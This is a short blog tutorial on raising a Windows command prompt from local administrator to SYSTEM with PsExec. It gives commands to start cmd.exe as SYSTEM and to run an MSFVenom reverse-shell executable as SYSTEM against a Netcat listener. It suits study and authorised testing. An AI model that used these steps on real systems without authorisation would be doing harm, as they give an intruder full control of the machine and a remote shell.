Elevate to SYSTEM privilege (Windows)

Hi everyone!

This is post is on elevating your CMD to SYSTEM access. Let’s get started!

Requirements

  • Psexec.exe (Sysinternal tool)
  • Local administration privilege

Obtaining SYSTEM

Firstly, launch CMD in administrative privilege if you are on GUI. Otherwise, make sure you are on an admin account in a reverse/bind shell.

Local spawn CMD

In your CMD:

> Psexec.exe -s -i cmd.exe

Reverse shell

Make sure you have a compiled EXE file which can be a reverse shell from MSFVenom. Listen via your Netcat in the specified port when creating the reverse shell. In your CMD:

> Psexec.exe -s -i msfRevShell.exe

Result

It should show you this when you run the whoami command:

> whoami
nt authority\system

I hope this post has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.